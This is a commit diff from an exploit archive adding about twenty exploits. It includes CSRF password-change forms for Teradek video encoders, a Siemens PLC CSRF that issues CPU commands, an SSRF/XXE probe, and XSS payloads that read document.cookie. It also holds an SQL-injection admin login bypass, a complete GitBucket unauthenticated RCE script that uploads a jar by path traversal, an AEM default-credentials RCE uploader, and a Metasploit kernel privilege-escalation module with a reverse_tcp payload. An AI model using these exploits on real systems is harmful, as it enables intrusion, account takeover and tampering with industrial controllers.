DB: 2018-05-22

23 changes to exploits/shellcodes Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit) R 3.4.4 - Local Buffer Overflow (DEP Bypass) KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution Superfood 1.0 - Multiple Vulnerabilities Private Message PHP Script 2.0 - Persistent Cross-Site Scripting Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Zenar Content Management System - Cross-Site Scripting GitBucket 4.23.1 - Remote Code Execution ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery Teradek Cube 7.3.6 - Cross-Site Request Forgery Teradek Slice 7.3.15 - Cross-Site Request Forgery Schneider Electric PLCs - Cross-Site Request Forgery Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass Merge PACS 7.0 - Cross-Site Request Forgery Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
2018-05-22 05:01:47 +00:00 · 2018-05-22 05:01:47 +00:00 · 08c35595ed
commit 08c35595ed
parent 42f3759885
21 changed files with 1240 additions and 58 deletions
--- a/exploits/hardware/webapps/44671.html
+++ b/exploits/hardware/webapps/44671.html
@ -0,0 +1,53 @@
 <!--
 Teradek VidiU Pro 3.0.3 CSRF Change Password Exploit
 Vendor: Teradek, LLC
 Product web page: https://www.teradek.com
 Affected version: VidiU, VidiU Mini, VidiU Pro
                  3.0.3 (build 32136)
                  3.0.2 (build 31225)
                  2.4.10
 Summary: The Teradek VidiU gives you the freedom to broadcast live
 high definition video directly to the Web without a PC. Whether you're
 streaming out of a video switcher or wirelessly from your camera,
 VidiU allows you to go live when you want, where you want. VidiU
 offers API level integration with the Ustream, YouTube Live and
 Livestream platforms, which makes streaming to your channel as
 easy as logging into your account.
 Desc: The application interface allows users to perform certain
 actions via HTTP requests without performing any validity checks
 to verify the requests. This can be exploited to perform certain
 actions with administrative privileges if a logged-in user visits
 a malicious web site.
 Tested on: lighttpd/1.4.48
           lighttpd/1.4.31
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2018-5460
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5460.php
 02.03.2018
 -->
 <html>
  <body>
    <form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
      <input type="hidden" name="pw1" value="P@ssw0rd" />
      <input type="hidden" name="pw2" value="P@ssw0rd" />
      <input type="hidden" name="user" value="admin" />
      <input type="submit" value="Initiate" />
    </form>
  </body>
 </html>
--- a/exploits/hardware/webapps/44672.txt
+++ b/exploits/hardware/webapps/44672.txt
@ -0,0 +1,118 @@
 Teradek VidiU Pro 3.0.3 SSRF Vulnerability
 Vendor: Teradek, LLC
 Product web page: https://www.teradek.com
 Affected version: VidiU, VidiU Mini, VidiU Pro
                  3.0.3r32136
                  3.0.2r31225
                  2.4.10
 Summary: The Teradek VidiU gives you the freedom to broadcast live
 high definition video directly to the Web without a PC. Whether you're
 streaming out of a video switcher or wirelessly from your camera,
 VidiU allows you to go live when you want, where you want. VidiU
 offers API level integration with the Ustream, YouTube Live and
 Livestream platforms, which makes streaming to your channel as
 easy as logging into your account.
 Desc: A server-side request forgery (SSRF) vulnerability exists in
 the VidiU management interface within the RTMP settings and the Wowza
 server mode functionality. The application parses user supplied data
 in the GET parameters 'url' and 'xml_url' to construct a page request
 that loads the configuration for specific service. Since no validation
 is carried out on the parameters, an attacker can specify an external
 domain and force the application to make a HTTP request to an arbitrary
 destination host, including xml data parsing (XXE potential). This can
 be used by an external attacker for example to bypass firewalls and
 initiate a service and network enumeration on the internal network
 through the affected application.
 Tested on: lighttpd/1.4.48
           lighttpd/1.4.31
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2018-5461
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5461.php
 02.03.2018
 --
 SSRF open port:
 ---------------
 GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:443&_=1526243349301 HTTP/1.1 
 Host: 127.0.0.1:8090 
 HTTP/1.1 200 OK 
 Content-Type: application/json 
 Connection: close 
 Date: Sun, 13 May 2018 21:42:30 GMT 
 Server: lighttpd/1.4.31 
 Content-Length: 31 
 {"error":"invalid parameters"}
 SSRF closed port:
 -----------------
 GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:7777&_=1526243349301 HTTP/1.1 
 Host: 127.0.0.1:8090 
 HTTP/1.1 200 OK 
 Content-Length: 0 
 Connection: close 
 Date: Sun, 13 May 2018 21:43:30 GMT 
 Server: lighttpd/1.4.31
 ===================================================
 SSRF closed port:
 -----------------
 GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:7777&_=1526244218671 HTTP/1.1 
 Host: 127.0.0.1:8090 
 {"result":"error", "error":"Curl error"}
 SSRF open port:
 ---------------
 GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:443&_=1526244218671 HTTP/1.1 
 Host: 127.0.0.1:8090 
 {"result":"error", "error":"Bad request"}
 ===================================================
 PoC CSRF Blind XXE SSRF OOB:
 ----------------------------
 <html>
  <body>
    <form action="http://127.0.0.1:8090/cgi-bin/system.cgi">
      <input type="hidden" name="command" value="rtmp" />
      <input type="hidden" name="action" value="rtmp_xml_from_url" />
      <input type="hidden" name="xml_url" value="http://site.tld/xxe.xml" />
      <input type="hidden" name="_" value="1526244218671" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
--- a/exploits/hardware/webapps/44675.html
+++ b/exploits/hardware/webapps/44675.html
@ -0,0 +1,50 @@
 <!--
 Teradek Cube 7.3.6 CSRF Change Password Exploit
 Vendor: Teradek, LLC
 Product web page: https://www.teradek.com
 Affected version: Firmware Version: 7.3.6 (build 26850)
                  Hardware Version: 1.5
                  Teradek Firmware Version 7.3.15
 Summary: Cube packs world-class video quality into a rugged, portable
 chassis for quick IP video deployments at any location. Each encoder
 and decoder includes HDMI and 3G-SDI I/O, Ethernet / WiFI connectivity,
 and full duplex IFB.
 Desc: The application interface allows users to perform certain actions
 via HTTP requests without performing any validity checks to verify the
 requests. This can be exploited to perform certain actions with administrative
 privileges if a logged-in user visits a malicious web site.
 Tested on: lighttpd/1.4.31
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2018-5464
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5464.php
 02.03.2018
 -->
 <html>
  <body>
    <form action="http://127.0.0.1/cgi-bin/system.cgi" method="POST">
      <input type="hidden" name="command" value="password" />
      <input type="hidden" name="pw1" value="P@ssw0rd" />
      <input type="hidden" name="pw2" value="P@ssw0rd" />
      <input type="hidden" name="user" value="admin" />
      <input type="hidden" name="action" value="Change&#32;Password" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
--- a/exploits/hardware/webapps/44676.html
+++ b/exploits/hardware/webapps/44676.html
@ -0,0 +1,48 @@
 <!--
 Teradek Slice 7.3.15 CSRF Change Password Exploit
 Vendor: Teradek, LLC
 Product web page: https://www.teradek.com
 Affected version: Firmware Version: 7.3.15 (build 31735)
                  Hardware Version: 2.1
 Summary: Built on the award-winning Cube platform, Slice is a rack mount
 HEVC / H.264 codec designed to fit seamlessly into your broadcast studio.
 Like the Cube, Slice encoders and decoders includes 3G-SDI and HDMI I/O,
 Ethernet and WiFi connectivity, and full duplex IFB.
 Desc: The application interface allows users to perform certain actions
 via HTTP requests without performing any validity checks to verify the
 requests. This can be exploited to perform certain actions with administrative
 privileges if a logged-in user visits a malicious web site.
 Tested on: lighttpd/1.4.48
           lighttpd/1.4.31
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 Advisory ID: ZSL-2018-5467
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php
 02.03.2018
 -->
 <html>
  <body>
    <form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
      <input type="hidden" name="pw1" value="P@ssw0rd" />
      <input type="hidden" name="pw2" value="P@ssw0rd" />
      <input type="hidden" name="user" value="admin" />
      <input type="submit" value="Initiate" />
    </form>
  </body>
 </html>
--- a/exploits/java/webapps/44666.txt
+++ b/exploits/java/webapps/44666.txt
@ -0,0 +1,35 @@
 # Exploit Title: ManageEngine Recovery Manager Plus 5.3 (Build 5330) - Persistent Cross-Site Scripting
 # Dated: 2018-03-31
 # Exploit Author: Ahmet GÜREL
 # Software Link: https://www.manageengine.com/ad-recovery-manager/
 # Version: < = 5.3 (Build 5330)
 # Platform: Java
 # Tested on: Windows
 # CVE: CVE-2018-9163
 # 1. DETAILS
 # In the Add New Technician (s) section on the /admin/technicians page of the
 # ManageEngine Recovery Manager Plus 5.3 (Build 5330) application, allows
 # remote authenticated users with the Login Name parameter is vulnerable to
 # XSS. The parameters entered are written in the database and affect all
 # users.
 # 2. PoC:
 # From the Add New Technician (s) page, it is possible to inject malicious
 # web code inside Login Name parameter. The HTTP request looks like the following:
 GET
 /technicianAction.do?req={%22domainId%22:0,%22loginName%22:%22%3Csvg%20onload%3Dprompt(document.domain)%3E%22,%22password%22:%22Test123%22,%22isDomainUser%22:false,%22roleId%22:1,%22operation%22:%22createTechnicians%22}
 HTTP/1.1
 Host: 172.16.219.168:8090
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0)
 Gecko/20100101 Firefox/59.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Referer: http://172.16.219.168:8090/
 Content-Type: application/json; charset=utf-8
 X-Requested-With: XMLHttpRequest
 Cookie: JSESSIONIDRMP=64556C394C0687AA34179CFE2EF4EA5A;
 JSESSIONIDSSO=0605E8EB825B181A4A201542A518457D
 Connection: close
--- a/exploits/java/webapps/44668.py
+++ b/exploits/java/webapps/44668.py
@ -0,0 +1,171 @@
 # Exploit Title: GitBucket 4.23.1 Unauthenticated RCE
 # Date: 21-05-2018
 # Software Link: https://github.com/gitbucket/gitbucket
 # Exploit Author: Kacper Szurek
 # Contact: https://twitter.com/KacperSzurek
 # Website: https://security.szurek.pl/
 # Category: remote
 1. Description
 Abusing weak secret token and passing insecure parameter to File function.
 2. Proof of Concept
 import os 
 try:
 	from Crypto.Cipher import Blowfish
 except:
 	print "pip install pycrypto"
 	os._exit(0)
 import binascii
 import base64
 import urllib2
 import urllib
 import time
 import sys
 import pickle
 print "GitBucket 4.23.1 Unauthenticated RCE"
 print "by Kacper Szurek"
 print "https://security.szurek.pl/"
 print "Working only when server is installed on Windows"
 def PKCS5Padding(string):
    byteNum = len(string)
    packingLength = 8 - byteNum % 8
    appendage = chr(packingLength) * packingLength
    return string + appendage
 def encrypt(content, key):
    content = PKCS5Padding(content)
    cipher = Blowfish.new(key, Blowfish.MODE_ECB)
    return base64.b64encode(cipher.encrypt(content))
 def get_file(git_bucket_url, file, key, expiration_time):
    payload = "{} {}".format(expiration_time, file)
    authorization = encrypt(payload, key)
    url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
    try:
        request = urllib2.Request(url)
        request.add_header("Authorization", authorization)   
        result = urllib2.urlopen(request).read()
        return result
    except Exception, e:
        # If payload is correct and file does not exist, we got error 400
        if not "Error 500" in e.read():
            return 'OK'
 def put_file(git_bucket_url, file, key, expiration_time, content):
    payload = "{} {}".format(expiration_time, file)
    authorization = encrypt(payload, key)
    url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
    try:
        request = urllib2.Request(url, data=content)
        request.add_header("Authorization", authorization)
        request.get_method = lambda: 'PUT' 
        result = urllib2.urlopen(request)
        return result.getcode() == 200
    except Exception, e:
        return None
 def send_command(git_bucket_url, command):
    try:
        result = urllib2.urlopen("{}/exploit?{}".format(git_bucket_url, urllib.urlencode({'command' : command}))).read()
        return result
    except:
        return None
 def pickle_key(url, key):
    output = open(pickle_path, "wb")
    pickle.dump({'url' : url, 'key' : key}, output)
    output.close()
    print "[+] Key pickled for futher use"
 def unpickle_key(url):
    if os.path.isfile(pickle_path):
        pickled_file = open(pickle_path, "rb")
        data = pickle.load(pickled_file)
        pickled_file.close()
        if data['url'] == url:
            return data['key']
    return None
 if len(sys.argv) != 3:
    print "[-] Usage: exploit.py url command"
    os._exit(0)
 exploit_jar = 'exploit.jar'
 url = sys.argv[1]
 command = sys.argv[2]
 pickle_path = 'gitbucket.pickle'
 if url.endswith('/'):
    url = url[0:-1]
 try:
    is_gitbucket = urllib2.urlopen("{}/api/v3/".format(url), timeout=5).read()
 except:
    is_gitbucket = ""
 if not is_gitbucket.startswith('{"rate_limit_url"'):
    print "[-] Probably not gitbucket url: {}".format(url)
    os._exit(0)
 if not os.path.isfile(exploit_jar):
    print "[-] Missing exploit file: {}".format(exploit_jar)
    os._exit(0)
 expiration_time = int(round(time.time() * 1000))+(1000*6000)
 print "[+] Set expire time to: {}".format(expiration_time)
 print "[+] Start search blowfish key: "
 for i in range(0, 10000):
    if i % 100 == 0:
        print "+",
    potential_key = unpickle_key(url)
    if potential_key:
        print "\n[+] Unpickle key, try it"
    else:
        potential_key = str(i).zfill(4)
    config_path = "non_existing_file"
    config_content = get_file(url, config_path, potential_key, expiration_time)
    if config_content:
        print "\n[+] Found blowfish key: {}".format(potential_key)
        print "[+] Config content:\n{}".format(config_content)
        exploit_path = "..\..\..\..\plugins\exploit.jar"
        f = open(exploit_jar, "rb")
        exploit_content = f.read()
        f.close()
        if put_file(url, exploit_path, potential_key, expiration_time, exploit_content):
            print "[+] Wait few second for plugin load"
            time.sleep(5)
            command_content = send_command(url, "cmd /c {}".format(command))
            if command_content:            
                    pickle_key(url, potential_key)
                    print command_content
            else:
                print "[-] Cannot execute command"
        else:
            print "[-] Cannot upload exploit.jar"
        os._exit(0)
 3. Solution:
 Update to version 4.24.1
 https://github.com/gitbucket/gitbucket/releases/download/4.24.1/gitbucket.war
--- a/exploits/jsp/webapps/44659.py
+++ b/exploits/jsp/webapps/44659.py
@ -1,56 +0,0 @@
 # Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE
 # Date: 5/19/18
 # Exploit Author: StaticFlow
 # Vendor Homepage: https://www.adobe.com/in/marketing-cloud/experience-manager.html
 # Version: < 6.3
 import requests
 import sys
 baseUrl = 'https://test.com/' #default domain, change here or pass in on command line
 credentialList = [['anonymous','anonymous'], ['author','author'], ['admin','admin']]
 exploit = 'rce.jsp' #default file name, must be in same dir as python file or passed in on command line
 def testLogins():
 	for credential in credentialList:
 		response = requests.get(baseUrl, auth=(credential[0], credential[1]))
 		if(response.status_code == 200):
 			return credential
 	return False
 if len(sys.argv) == 2:
 	baseUrl = sys.argv[1]
 if len(sys.argv) == 3:
 	exploit = sys.argv[2]
 gotCreds = testLogins()
 if(gotCreds):
 	attackChain = [
 		{
 	    	'jcr:primaryType': (None, 'nt:folder') #create a folder for our exploit
 	    },
 	    {
 			'exec.jsp': ('rce.jsp', open(exploit, 'rb')) #upload the exploit
 		},
 		{
 			':operation': (None, 'copy'), #copy exploit folder over to app folder for staging
 			':dest': (None, '/apps/rcetype')
 	    },
 	    {
 			'sling:resourceType': (None, 'rcetype') #instruct Apache Sling to initialize our exploit code as a servlet
 		}
 	]
 	print "creating folder structure and uploading exploit"
 	for attack in attackChain[:-1]:
 		response = requests.post(baseUrl+'content/rcetype', files=attack, auth=(gotCreds[0], gotCreds[1]))
 		if response.status_code > 201:
 			print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
 			print response.content
 			sys.exit(0)
 	print "initializing servlet from exploit"
 	response = requests.post(baseUrl+'content/rce', files=attackChain[-1], auth=(gotCreds[0], gotCreds[1]))
 	if response.status_code > 201:
 		print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
 		print response.content
 		sys.exit(0)
 	print """Should be good to go, run 'curl -X "GET" -u {}:{} {}' and your exploit should run""".format(gotCreds[0],gotCreds[1],baseUrl+'content/rce.exec')
--- a/exploits/linux/local/44677.rb
+++ b/exploits/linux/local/44677.rb
@ -0,0 +1,187 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Reliable Datagram Sockets (RDS) Privilege Escalation',
      'Description'    => %q{
        This module exploits a vulnerability in the rds_page_copy_user function
        in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
        to execute code as root (CVE-2010-3904).
        This module has been tested successfully on Fedora 13 (i686) with
        kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)
        with kernel version 2.6.32-21-generic.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Dan Rosenberg', # Discovery and C exploit
          'Brendan Coles'  # Metasploit
        ],
      'DisclosureDate' => 'Oct 20 2010',
      'Platform'       => [ 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'Targets'        => [[ 'Auto', {} ]],
      'Privileged'     => true,
      'References'     =>
        [
          [ 'AKA', 'rds-fail.c' ],
          [ 'EDB', '15285' ],
          [ 'CVE', '2010-3904' ],
          [ 'BID', '44219' ],
          [ 'URL', 'https://securitytracker.com/id?1024613' ],
          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ],
          [ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ],
          [ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ],
          [ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],
        ],
      'DefaultOptions' =>
        {
          'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp',
          'WfsDelay'    => 10,
          'PrependFork' => true
        },
      'DefaultTarget'  => 0))
    register_options [
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
    ]
  end
  def base_dir
    datastore['WritableDir'].to_s
  end
  def modules_disabled?
    modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip
    (modules_disabled.eql?('1') || modules_disabled.eql?('2'))
  end
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end
  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end
  def upload_and_compile(path, data)
    upload "#{path}.c", data
    output = cmd_exec "gcc -o #{path} #{path}.c"
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end
    cmd_exec "chmod +x #{path}"
    register_file_for_cleanup path
  end
  def exploit_data(file)
    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file
    fd = ::File.open path, 'rb'
    data = fd.read fd.stat.size
    fd.close
    data
  end
  def live_compile?
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
    if has_gcc?
      vprint_good 'gcc is installed'
      return true
    end
    unless datastore['COMPILE'].eql? 'Auto'
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
    end
  end
  def check
    version = kernel_release
    unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') &&
           Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37')
      vprint_error "Linux kernel version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Linux kernel version #{version} appears to be vulnerable"
    unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'
      vprint_error 'RDS kernel module is not available'
      return CheckCode::Safe
    end
    vprint_good 'RDS kernel module is available'
    if modules_disabled?
      unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'
        vprint_error 'RDS kernel module is not loadable'
        return CheckCode::Safe
      end
    end
    vprint_good 'RDS kernel module is loadable'
    CheckCode::Appears
  end
  def exploit
    unless check == CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end
    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end
    # Upload exploit executable
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    if live_compile?
      vprint_status 'Live compiling exploit on system...'
      upload_and_compile executable_path, exploit_data('rds-fail.c')
    else
      vprint_status 'Dropping pre-compiled exploit on system...'
      arch = kernel_hardware
      case arch
      when /amd64|ia64|x86_64|x64/i
        upload_and_chmodx executable_path, exploit_data('rds-fail.x64')
      when /x86|i[3456]86/
        upload_and_chmodx executable_path, exploit_data('rds-fail.x86')
      else
        fail_with Failure::NoTarget, "No pre-compiled binaries are available for system architecture: #{arch}"
      end
    end
    # Upload payload executable
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe
    # Launch exploit
    print_status 'Launching exploit...'
    output = cmd_exec "#{executable_path} #{payload_path}"
    output.each_line { |line| vprint_status line.chomp }
  end
 end
--- a/exploits/linux/webapps/44667.txt
+++ b/exploits/linux/webapps/44667.txt
@ -0,0 +1,15 @@
 # Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
 # Google Dork: inurl:/Portal/Portal.mwsl
 # Date: 2018-05-21
 # Exploit Author: t4rkd3vilz, Jameel Nabbo
 # Vendor Homepage: https://www.siemens.com/
 # Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
 # Tested on: Kali Linux
 # CVE: CVE-2015- 5698
 # 1. Proof of Concept
 <form method="POST" action="http://targetIp/CPUCommands">
    <input name="PriNav" value="Start">
    <input type="submit" value="Go!">
 </form>
--- a/exploits/linux/webapps/44681.txt
+++ b/exploits/linux/webapps/44681.txt
@ -0,0 +1,39 @@
 # Exploit Title: Merge PACS 7.0 - Cross-Site Request Forgery
 # Google Dork: -
 # Date: 2018-05-21
 # Exploit Author: Safak Aslan
 # Vendor Homepage: http://www.merge.com/
 # Version:  Merge PACS 7.0
 # Tested on: Windows
 # CVE: -
 # 1. Proof of Concept
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://targetIP/servlet/actions/merge-viewer/summary" method="POST">
      <input type="hidden" name="amicasUsername" value="merge" />
      <input type="hidden" name="password" value="viewer" />
      <input type="hidden" name="submitButton" value="Login" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
 Post Data:
 POST /servlet/actions/merge-viewer/summary HTTP/1.1
 Host: targetIP
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3
 Accept-Encoding: gzip, deflate
 Referer: https://targetIP/servlet/actions/merge-viewer/login?redirectTo=https%3A%2F%2FtargetIP%2Fservlet%2Factions%2Fmerge-viewer%2Fsummary
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 55
 Cookie: JSESSIONID=6846606B53045FE6474A57C71719C93D
 Connection: close
 Upgrade-Insecure-Requests: 1
 amicasUsername=merge&password=viewer&submitButton=Login
--- a/exploits/php/webapps/44661.txt
+++ b/exploits/php/webapps/44661.txt
@ -0,0 +1,57 @@
 # Exploit Title:  Superfood - Restaurants & Online Food Order System  1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass
 # Date: 2018-05-20
 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
 # Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30
 # Version: 1.0
 # Tested on: Kali linux
 ====================================================
 # Description:
 Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities :
 ====================================================
 # POC 1 : Persistent cross site scripting :
 1) After creating an account , go to your profile.
 2) Navigate to "Update profile" and put this payload :
 "/><script>alert('xss')</script>
 3) You will have an alert box in the page .
 ====================================================
 # POC 2 : CSRF :
 Attacker can change user's authentication directly :
 # User's CSRF exploit :
 <html>
 <head>
    <title>CSRF POC</title>
 </head>
 <body>
    <form action="http://restaurant.thesoftking.com/updateprofile"
 method="post">
        <input type="hidden" name="name" value="anything">
        <input type="hidden" name="mobile" value="1000000000">
        <input type="hidden" name="address" value="anything">
    </form>
    <script>
        document.forms[0].submit();
    </script>
 </body>
 </html>
 # Admin page CSRF exploit :
 <form action="http://restaurant.thesoftking.com/admin/setgeneral.php"
 method="post">
        <input name="name" value="exploit" type="hidden">
        <input name="wcmsg" value="test" type="hidden">
        <input name="address" value="test2" type="hidden">
        <input name="mobile" value="1000000" type="hidden">
        <input name="email" value="test@test.com" type="hidden">
        <input name="currency" value="decode" type="hidden">
 </form>
    <script>
         document.forms[0].submit();
    </script>
 ====================================================
 # POC 3 : Authentication bypass :
 # Attacker can bypass admin panel without any authentication :
 Path : /admin
 Username : ' or 0=0 #
 Password : anything
 ====================================================
--- a/exploits/php/webapps/44662.txt
+++ b/exploits/php/webapps/44662.txt
@ -0,0 +1,18 @@
 # Exploit Title:  Private Message PHP Script 2.0 - Persistent Cross-Site scripting
 # Date: 2018-05-20
 # Exploit Author: Borna nematzadeh (L0RD)
 # Vendor Homepage: https://codecanyon.net/item/private-message-php-script/21027192?s_rank=1
 # Version: 2.0
 # Tested on: Windows
 # Description :
 Private Message PHP Script 2.0 suffers from persistent cross site scripting.
 You can put your malicious javascript payload .
 When target opens your massege ,  payload will be executed before self destruction .
 # POC :
 1) Put this payload into textarea and click submit :
 </textarea><script>alert(document.cookie)</script>
 2) You will get a link which your javascript code is inside this link . You can send this link to anyone .
 3) After clicking on "show me the message" , payload will be executed .
--- a/exploits/php/webapps/44663.txt
+++ b/exploits/php/webapps/44663.txt
@ -0,0 +1,34 @@
 # Exploit Title:  Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery
 # Date: 2018-05-20
 # Dork: N/A
 # Exploit Author: borna nematzadeh (L0RD)
 # Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630
 # Version: 1.1.0
 # Tested on: Kali linux
 # POC 1 : Persistent Cross site scripting :
 1) After creating an account , navigate to "Edit profile" .
 2) Put this payload into the "Birthday" and save changes :
 " onmouseover=alert(document.cookie) "
 3) You will have an alert box in the page .
 # POC 2 : Cross site request forgery :
 <html>
 <head>
  <title>CSRF POC</title>
 </head>
  <body>
    <form action="http://damnfacts.flippydemos.com/submit_profile.php" method="POST">
      <input type="hidden" name="sex" value="Male" />
      <input type="hidden" name="birthday" value="test" />
      <input type="hidden" name="uEmail" value="ninjaassassinbn&#64;yahoo&#46;com" />
      <input type="hidden" name="country" value="United&#32;States" />
      <input type="hidden" name="about" value="test" />
    </form>
    <script>
      document.forms[0].submit();
      // profile will be updated successfully.
    </script>
  </body>
 </html>
--- a/exploits/php/webapps/44664.txt
+++ b/exploits/php/webapps/44664.txt
@ -0,0 +1,41 @@
 # Exploit Title: Zenar Content Management System - Cross-Site Scripting
 # Software Link: https://zenar.io/
 # Dork: N/A
 # Author: Berk Dusunur
 # Tested Website: http://demo.zenar.io
 # Date: 2018-05-20
 # Category: Web App
 # PoC
 # GET Request:
 POST /zenario/ajax.php?method_call=refreshPlugin&inIframe=true HTTP/1.1
 Host: demo.zenar.io
 Cache-Control: no-cache
 Connection: Keep-Alive
 Accept: text/plain, */*; q=0.01
 Origin: http://demo.zenar.io
 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
 X-Requested-With: XMLHttpRequest
 Referer: http://demo.zenar.io/enquiries/newsletter-sign-up
 Accept-Language: en-us,en;q=0.5
 X-Scanner: Netsparker
 Cookie: PHPSESSID=27pdf3fd0plfnarmh5edk5es33
 Accept-Encoding: gzip, deflate
 Content-Length: 273
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 cID=25&slideId=3&cType=html&slotName=Slot_Main_2&instanceId=143&containerId=plgslt_Slot_Main_2&formPageHash=35263a7d5401cb22f77e67fb50fcdd99&reloaded=1&inFullScreen=3&field_14=netsparker%40example.com&current_page='"--></style></scRipt><scRipt>alert(EZK)</scRipt>
 # Response:
 <input type="hidden" name="formPageHash"
 value="35263a7d5401cb22f77e67fb50fcdd99"/><input type="hidden"
 name="reloaded" value="1"/><input type="hidden" name="inFullScreen"
